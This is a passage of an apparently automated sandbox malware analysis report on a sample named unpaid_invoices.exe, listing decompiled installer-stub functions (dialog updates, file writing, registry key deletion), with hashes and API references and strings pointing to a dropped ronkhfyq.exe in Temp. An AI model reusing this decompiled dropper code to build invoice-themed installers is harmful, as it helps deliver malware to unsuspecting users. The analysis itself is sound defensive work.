              • GetMessagePos.USER32 ref: 00404FA8
              • ScreenToClient.USER32 ref: 00404FC2
              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404FD4
              • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404FFA
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: Message$Send$ClientScreen
              • String ID: f
              • API String ID: 41195575-1993550816
              • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
              • Instruction ID: 51d4338ac073bbeac8b2964ce5aa15998fcdd55d82c6f64f668885239b8ba4c4
              • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
              • Instruction Fuzzy Hash: D6015E7194021DBADB00DBA5DD85FFEBBBCAF54711F10012BBB50B61C0D7B49A058BA5
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
              				short _v132;
              				void* _t11;
              				WCHAR* _t19;
              
              				if(_a8 == 0x110) {
              					SetTimer(_a4, 1, 0xfa, 0);
              					_a8 = 0x113;
              				}
              				if(_a8 == 0x113) {
              					_t11 = E00403012();
              					_t19 = L"unpacking data: %d%%";
              					if( *0x7a8ab0 == 0) {
              						_t19 = L"verifying installer: %d%%";
              					}
              					wsprintfW( &_v132, _t19, _t11);
              					SetWindowTextW(_a4,  &_v132);
              					SetDlgItemTextW(_a4, 0x406,  &_v132);
              				}
              				return 0;
              			}







              APIs
              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
              • wsprintfW.USER32 ref: 00402FE5
              • SetWindowTextW.USER32(?,?), ref: 00402FF5
              • SetDlgItemTextW.USER32 ref: 00403007
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: Text$ItemTimerWindowwsprintf
              • String ID: unpacking data: %d%%$verifying installer: %d%%
              • API String ID: 1451636040-1158693248
              • Opcode ID: 863410c55cf87ff373a2389e5224159976098539ce34d2f9597aa36d95ce2bb5
              • Instruction ID: 8fb0b87627a2e5c232f470bc2292a7be8d93e7e9342cf65e243ccc0cc3a46c1c
              • Opcode Fuzzy Hash: 863410c55cf87ff373a2389e5224159976098539ce34d2f9597aa36d95ce2bb5
              • Instruction Fuzzy Hash: 74F0367050020DABEF246F50DD49BEA3B69EB40309F00C03AF606B51D0DBBD99549B59
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 93%
              			E00402950(void* __ebx) {
              				WCHAR* _t26;
              				void* _t29;
              				long _t37;
              				void* _t49;
              				void* _t52;
              				void* _t54;
              				void* _t56;
              				void* _t59;
              				void* _t60;
              				void* _t61;
              
              				_t49 = __ebx;
              				_t52 = 0xfffffd66;
              				_t26 = E00402DA6(0xfffffff0);
              				_t55 = _t26;
              				 *(_t61 - 0x40) = _t26;
              				if(E00405FB4(_t26) == 0) {
              					E00402DA6(0xffffffed);
              				}
              				E00406139(_t55);
              				_t29 = E0040615E(_t55, 0x40000000, 2);
              				 *(_t61 + 8) = _t29;
              				if(_t29 != 0xffffffff) {
              					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
              					if( *(_t61 - 0x28) != _t49) {
              						_t37 =  *0x7a8ab4;
              						 *(_t61 - 0x44) = _t37;
              						_t54 = GlobalAlloc(0x40, _t37);
              						if(_t54 != _t49) {
              							E004035FE(_t49);
              							E004035E8(_t54,  *(_t61 - 0x44));
              							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
              							 *(_t61 - 0x10) = _t59;
              							if(_t59 != _t49) {
              								E00403377(_t51,  *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
              								while( *_t59 != _t49) {
              									_t51 =  *_t59;
              									_t60 = _t59 + 8;
              									 *(_t61 - 0x3c) =  *_t59;
              									E00406119( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
              									_t59 = _t60 +  *(_t61 - 0x3c);
              								}
              								GlobalFree( *(_t61 - 0x10));
              							}
              							E00406210( *(_t61 + 8), _t54,  *(_t61 - 0x44));
              							GlobalFree(_t54);
              							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
              						}
              					}
              					_t52 = E00403377(_t51,  *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
              					CloseHandle( *(_t61 + 8));
              				}
              				_t56 = 0xfffffff3;
              				if(_t52 < _t49) {
              					_t56 = 0xffffffef;
              					DeleteFileW( *(_t61 - 0x40));
              					 *((intOrPtr*)(_t61 - 4)) = 1;
              				}
              				_push(_t56);
              				E00401423();
              				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t61 - 4));
              				return 0;
              			}














              APIs
              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
              • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
              • GlobalFree.KERNEL32 ref: 00402A06
              • GlobalFree.KERNEL32 ref: 00402A19
              • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
              • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: Global$AllocFree$CloseDeleteFileHandle
              • String ID:
              • API String ID: 2667972263-0
              • Opcode ID: 01061f3d3ca3a4d7c364cd067c19041a51f9a0b08810e1f4a161c9a0c4070a25
              • Instruction ID: ec4356a3eb6c7711b506d5a245a30aad41ccfdb787a60eec272099fea1c037c4
              • Opcode Fuzzy Hash: 01061f3d3ca3a4d7c364cd067c19041a51f9a0b08810e1f4a161c9a0c4070a25
              • Instruction Fuzzy Hash: D431C271D00124BBCF216FA9CE49DDEBE79AF49364F14023AF450762E1CB798D419B98
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 48%
              			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
              				void* _v8;
              				int _v12;
              				short _v536;
              				void* _t27;
              				signed int _t33;
              				intOrPtr* _t35;
              				signed int _t45;
              				signed int _t46;
              				signed int _t47;
              
              				_t46 = _a12;
              				_t47 = _t46 & 0x00000300;
              				_t45 = _t46 & 0x00000001;
              				_t27 = E004064DB(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
              				if(_t27 == 0) {
              					if((_a12 & 0x00000002) == 0) {
              						L3:
              						_push(0x105);
              						_push( &_v536);
              						_push(0);
              						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
              							__eflags = _t45;
              							if(__eflags != 0) {
              								L10:
              								RegCloseKey(_v8);
              								return 0x3eb;
              							}
              							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
              							__eflags = _t33;
              							if(_t33 != 0) {
              								break;
              							}
              							_push(0x105);
              							_push( &_v536);
              							_push(_t45);
              						}
              						RegCloseKey(_v8);
              						_t35 = E00406A3B(3);
              						if(_t35 != 0) {
              							return  *_t35(_a4, _a8, _t47, 0);
              						}
              						return RegDeleteKeyW(_a4, _a8);
              					}
              					_v12 = 0;
              					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
              						goto L10;
              					}
              					goto L3;
              				}
              				return _t27;
              			}













              APIs
              • RegEnumValueW.ADVAPI32 ref: 00402EFD
              • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: CloseEnum$DeleteValue
              • String ID:
              • API String ID: 1354259210-0
              • Opcode ID: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
              • Instruction ID: e84adf69fee3246f56ef13a6fd4e717e0861f51d99737fac189c4d1833cff19f
              • Opcode Fuzzy Hash: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
              • Instruction Fuzzy Hash: 31213B7150010ABBDF11AF90CE89EEF7B7DEB54384F110076F909B21E0D7B59E54AA68
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 77%
              			E00401D81(void* __ebx, void* __edx) {
              				struct HWND__* _t30;
              				WCHAR* _t38;
              				void* _t48;
              				void* _t53;
              				signed int _t55;
              				signed int _t60;
              				long _t63;
              				void* _t65;
              
              				_t53 = __ebx;
              				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
              					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
              				} else {
              					E00402D84(2);
              					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
              				}
              				_t55 =  *(_t65 - 0x24);
              				 *(_t65 + 8) = _t30;
              				_t60 = _t55 & 0x00000004;
              				 *(_t65 - 0x38) = _t55 & 0x00000003;
              				 *(_t65 - 0x18) = _t55 >> 0x1f;
              				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
              				if((_t55 & 0x00010000) == 0) {
              					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
              				} else {
              					_t38 = E00402DA6(0x11);
              				}
              				 *(_t65 - 0x44) = _t38;
              				GetClientRect( *(_t65 + 8), _t65 - 0x60);
              				asm("sbb esi, esi");
              				_t63 = LoadImageW( ~_t60 &  *0x7a8aa0,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
              				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
              				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
              					DeleteObject(_t48);
              				}
              				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
              					_push(_t63);
              					E004065B5();
              				}
              				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t65 - 4));
              				return 0;
              			}












              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
              • String ID:
              • API String ID: 1849352358-0
              • Opcode ID: f665995d6bdb305172d13ad54de642187c856862005d3c57e5c2f614b82d9191
              • Instruction ID: 474cd979728561ffe20026c9632071baa6ad0bc9fd2f813aa8d1396f3614d648
              • Opcode Fuzzy Hash: f665995d6bdb305172d13ad54de642187c856862005d3c57e5c2f614b82d9191
              • Instruction Fuzzy Hash: DC212672D00119AFCF05CBA4DE45AEEBBB5EF08304F14403AF945F62A0DB389951DB98
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 73%
              			E00401E4E(intOrPtr __edx) {
              				void* __edi;
              				int _t9;
              				signed char _t15;
              				struct HFONT__* _t18;
              				intOrPtr _t30;
              				void* _t31;
              				struct HDC__* _t33;
              				void* _t35;
              
              				_t30 = __edx;
              				_t33 = GetDC( *(_t35 - 8));
              				_t9 = E00402D84(2);
              				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
              				0x40cdf8->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
              				ReleaseDC( *(_t35 - 8), _t33);
              				 *0x40ce08 = E00402D84(3);
              				_t15 =  *((intOrPtr*)(_t35 - 0x20));
              				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
              				 *0x40ce0f = 1;
              				 *0x40ce0c = _t15 & 0x00000001;
              				 *0x40ce0d = _t15 & 0x00000002;
              				 *0x40ce0e = _t15 & 0x00000004;
              				E004066AB(_t9, _t31, _t33, 0x40ce14,  *((intOrPtr*)(_t35 - 0x2c)));
              				_t18 = CreateFontIndirectW(0x40cdf8);
              				_push(_t18);
              				_push(_t31);
              				E004065B5();
              				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t35 - 4));
              				return 0;
              			}












              APIs
              • GetDC.USER32(?), ref: 00401E51
              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
              • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
              • ReleaseDC.USER32 ref: 00401E84
                • Part of subcall function 004066AB: lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\ronkhfyq.exe C:\Users\user\AppData\Local\Temp\neslq,\Microsoft\Internet Explorer\Quick Launch), ref: 00406850
                • Part of subcall function 004066AB: lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\ronkhfyq.exe C:\Users\user\AppData\Local\Temp\neslq,00000000,007A0F68,?,00405707,007A0F68,00000000), ref: 004068AA
              • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401ED3
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
              • String ID:
              • API String ID: 2584051700-0
              • Opcode ID: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
              • Instruction ID: c4fbce1732c038d4ae3387388930f25584bd8a0c3a5059ecf0713bcf7412b626
              • Opcode Fuzzy Hash: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
              • Instruction Fuzzy Hash: 0E01B571900241EFEB005BB4EE89A9A3FB0AB15301F208939F541B71D2C6B904459BED
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 59%
              			E00401C43(intOrPtr __edx) {
              				int _t29;
              				long _t30;
              				signed int _t32;
              				WCHAR* _t35;
              				long _t36;
              				int _t41;
              				signed int _t42;
              				int _t46;
              				int _t56;
              				intOrPtr _t57;
              				struct HWND__* _t63;
              				void* _t64;
              
              				_t57 = __edx;
              				_t29 = E00402D84(3);
              				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
              				 *(_t64 - 0x18) = _t29;
              				_t30 = E00402D84(4);
              				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
              				 *(_t64 + 8) = _t30;
              				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
              					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
              				}
              				__eflags =  *(_t64 - 0x1c) & 0x00000002;
              				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
              					 *(_t64 + 8) = E00402DA6(0x44);
              				}
              				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
              				_push(1);
              				if(__eflags != 0) {
              					_t61 = E00402DA6();
              					_t32 = E00402DA6();
              					asm("sbb ecx, ecx");
              					asm("sbb eax, eax");
              					_t35 =  ~( *_t31) & _t61;
              					__eflags = _t35;
              					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
              					goto L10;
              				} else {
              					_t63 = E00402D84();
              					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
              					_t41 = E00402D84(2);
              					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
              					_t56 =  *(_t64 - 0x1c) >> 2;
              					if(__eflags == 0) {
              						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
              						L10:
              						 *(_t64 - 0x38) = _t36;
              					} else {
              						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
              						asm("sbb eax, eax");
              						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
              					}
              				}
              				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
              				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
              					_push( *(_t64 - 0x38));
              					E004065B5();
              				}
              				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t64 - 4));
              				return 0;
              			}
















              APIs
              • SendMessageTimeoutW.USER32 ref: 00401CB3
              • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: MessageSend$Timeout
              • String ID: !
              • API String ID: 1777923405-2657877971
              • Opcode ID: a925d33b65f5538ff345f0f48edbd750304bc8babfa6be52d46d5660b496d1e6
              • Instruction ID: a8e9040b9442a73e8ccf438a9e221504da771f110143023329da3593775932a3
              • Opcode Fuzzy Hash: a925d33b65f5538ff345f0f48edbd750304bc8babfa6be52d46d5660b496d1e6
              • Instruction Fuzzy Hash: 2D219C7190420AAFEF05AFA4D94AAAE7BB4FF84304F14453EF601B61D0D7B88941CB98
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 77%
              			E00404E77(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
              				char _v68;
              				char _v132;
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				signed int _t23;
              				signed int _t24;
              				void* _t31;
              				void* _t33;
              				void* _t34;
              				void* _t44;
              				signed int _t46;
              				signed int _t50;
              				signed int _t52;
              				signed int _t53;
              				signed int _t55;
              
              				_t23 = _a16;
              				_t53 = _a12;
              				_t44 = 0xffffffdc;
              				if(_t23 == 0) {
              					_push(0x14);
              					_pop(0);
              					_t24 = _t53;
              					if(_t53 < 0x100000) {
              						_push(0xa);
              						_pop(0);
              						_t44 = 0xffffffdd;
              					}
              					if(_t53 < 0x400) {
              						_t44 = 0xffffffde;
              					}
              					if(_t53 < 0xffff3333) {
              						_t52 = 0x14;
              						asm("cdq");
              						_t24 = 1 / _t52 + _t53;
              					}
              					_t25 = _t24 & 0x00ffffff;
              					_t55 = _t24 >> 0;
              					_t46 = 0xa;
              					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
              				} else {
              					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
              					_t50 = 0;
              				}
              				_t31 = E004066AB(_t44, _t50, _t55,  &_v68, 0xffffffdf);
              				_t33 = E004066AB(_t44, _t50, _t55,  &_v132, _t44);
              				_t34 = E004066AB(_t44, _t50, 0x7a1f88, 0x7a1f88, _a8);
              				wsprintfW(_t34 + lstrlenW(0x7a1f88) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
              				return SetDlgItemTextW( *0x7a7a78, _a4, 0x7a1f88);
              			}




















              APIs
              • lstrlenW.KERNEL32(007A1F88,007A1F88,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F18
              • wsprintfW.USER32 ref: 00404F21
              • SetDlgItemTextW.USER32 ref: 00404F34
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: ItemTextlstrlenwsprintf
              • String ID: %u.%u%s%s
              • API String ID: 3540041739-3551169577
              • Opcode ID: 4298df8fa65d3e63540fdf60f99430adbe5e40f9a8b71c27c1b7671c68856ea4
              • Instruction ID: f4f79be78f3b00f65903d53a5db5cb29a0acdec533a94133042e7cdde7caf59d
              • Opcode Fuzzy Hash: 4298df8fa65d3e63540fdf60f99430adbe5e40f9a8b71c27c1b7671c68856ea4
              • Instruction Fuzzy Hash: 5711D5736041282BDB00A56DDD45E9F3288AB81334F250637FA25F21D1EA79882186E8
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 58%
              			E00405F3D(WCHAR* _a4) {
              				WCHAR* _t9;
              
              				_t9 = _a4;
              				_push( &(_t9[lstrlenW(_t9)]));
              				_push(_t9);
              				if( *(CharPrevW()) != 0x5c) {
              					lstrcatW(_t9, 0x40a014);
              				}
              				return _t9;
              			}





              APIs
              • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 00405F43
              • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 00405F4D
              • lstrcatW.KERNEL32(?,0040A014), ref: 00405F5F
              Strings
              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F3D
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: CharPrevlstrcatlstrlen
              • String ID: C:\Users\user\AppData\Local\Temp\
              • API String ID: 2659869361-3081826266
              • Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
              • Instruction ID: 4d139d42d978cba7810d0072a9498665e67a0d594e33c17037060be18c5eefd9
              • Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
              • Instruction Fuzzy Hash: F6D0A771101A306EC1117B648C04CDF729CEE89344346443BF901B70A0CB7D1D5287FD
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 89%
              			E00405644(struct HWND__* _a4, int _a8, int _a12, long _a16) {
              				int _t15;
              				long _t16;
              
              				_t15 = _a8;
              				if(_t15 != 0x102) {
              					if(_t15 != 0x200) {
              						_t16 = _a16;
              						L7:
              						if(_t15 == 0x419 &&  *0x7a1f74 != _t16) {
              							_push(_t16);
              							_push(6);
              							 *0x7a1f74 = _t16;
              							E00405005();
              						}
              						L11:
              						return CallWindowProcW( *0x7a1f7c, _a4, _t15, _a12, _t16);
              					}
              					if(IsWindowVisible(_a4) == 0) {
              						L10:
              						_t16 = _a16;
              						goto L11;
              					}
              					_t16 = E00404F85(_a4, 1);
              					_t15 = 0x419;
              					goto L7;
              				}
              				if(_a12 != 0x20) {
              					goto L10;
              				}
              				E00404616(0x413);
              				return 0;
              			}






              APIs
              • IsWindowVisible.USER32(?), ref: 00405673
              • CallWindowProcW.USER32(?,?,?,?), ref: 004056C4
                • Part of subcall function 00404616: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404628
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: Window$CallMessageProcSendVisible
              • String ID:
              • API String ID: 3748168415-3916222277
              • Opcode ID: 7939219b80a2ac52c1d0d435a37392739a133ef29b28caecab86fe9e557cc681
              • Instruction ID: d595ca740675a0faf81d7ea6a2f5abbfab032377942bf72e797c79c3d66f513a
              • Opcode Fuzzy Hash: 7939219b80a2ac52c1d0d435a37392739a133ef29b28caecab86fe9e557cc681
              • Instruction Fuzzy Hash: B1017131201609AFEF209F21DD80A9B3A26EB85754F904837FA08762D1C77B8D919F6D
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 90%
              			E0040653C(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
              				int _v8;
              				long _t21;
              				long _t24;
              				char* _t30;
              
              				asm("sbb eax, eax");
              				_v8 = 0x800;
              				_t21 = E004064DB(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
              				_t30 = _a16;
              				if(_t21 != 0) {
              					L4:
              					 *_t30 =  *_t30 & 0x00000000;
              				} else {
              					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
              					_t21 = RegCloseKey(_a20);
              					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
              					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
              						goto L4;
              					}
              				}
              				return _t21;
              			}








              APIs
              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000000,007A0F68,00000000,?,?,C:\Users\user\AppData\Local\Temp\ronkhfyq.exe C:\Users\user\AppData\Local\Temp\neslq,?,?,004067A3,80000002), ref: 00406582
              • RegCloseKey.ADVAPI32(?,?,004067A3,80000002,Software\Microsoft\Windows\CurrentVersion,C:\Users\user\AppData\Local\Temp\ronkhfyq.exe C:\Users\user\AppData\Local\Temp\neslq,C:\Users\user\AppData\Local\Temp\ronkhfyq.exe C:\Users\user\AppData\Local\Temp\neslq,C:\Users\user\AppData\Local\Temp\ronkhfyq.exe C:\Users\user\AppData\Local\Temp\neslq,00000000,007A0F68), ref: 0040658D
              Strings
              • C:\Users\user\AppData\Local\Temp\ronkhfyq.exe C:\Users\user\AppData\Local\Temp\neslq, xrefs: 00406543
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: CloseQueryValue
              • String ID: C:\Users\user\AppData\Local\Temp\ronkhfyq.exe C:\Users\user\AppData\Local\Temp\neslq
              • API String ID: 3356406503-1929354863
              • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
              • Instruction ID: 9e12fcea604be09863af9e628fe48d824a74a48827fd48a6b9c69832a92d0d42
              • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
              • Instruction Fuzzy Hash: DA015A72500209FADF218F51DC09EDB3BA8EB54364F01803AFD1AA2190E739D964DBA4
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 77%
              			E00405F89(WCHAR* _a4) {
              				WCHAR* _t5;
              				WCHAR* _t7;
              
              				_t7 = _a4;
              				_t5 =  &(_t7[lstrlenW(_t7)]);
              				while( *_t5 != 0x5c) {
              					_push(_t5);
              					_push(_t7);
              					_t5 = CharPrevW();
              					if(_t5 > _t7) {
              						continue;
              					}
              					break;
              				}
              				 *_t5 =  *_t5 & 0x00000000;
              				return  &(_t5[1]);
              			}






              APIs
              • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,0040313C,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\unpaid_invoices.exe,C:\Users\user\Desktop\unpaid_invoices.exe,80000000,00000003), ref: 00405F8F
              • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,0040313C,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\unpaid_invoices.exe,C:\Users\user\Desktop\unpaid_invoices.exe,80000000,00000003), ref: 00405F9F
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: CharPrevlstrlen
              • String ID: C:\Users\user\Desktop
              • API String ID: 2709904686-224404859
              • Opcode ID: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
              • Instruction ID: 7456b8531bb3b8a4d8e8c00392aaf18f99b4ab5ae19bc30171d9ddc8328a16ac
              • Opcode Fuzzy Hash: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
              • Instruction Fuzzy Hash: B1D05EB2411D219ED3126704DD0099F77A8EF5230174A4426E841E71A0D77C5C918AAD
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E004060C3(void* __ecx, CHAR* _a4, CHAR* _a8) {
              				int _v8;
              				int _t12;
              				int _t14;
              				int _t15;
              				CHAR* _t17;
              				CHAR* _t27;
              
              				_t12 = lstrlenA(_a8);
              				_t27 = _a4;
              				_v8 = _t12;
              				while(lstrlenA(_t27) >= _v8) {
              					_t14 = _v8;
              					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
              					_t15 = lstrcmpiA(_t27, _a8);
              					_t27[_v8] =  *(_t14 + _t27);
              					if(_t15 == 0) {
              						_t17 = _t27;
              					} else {
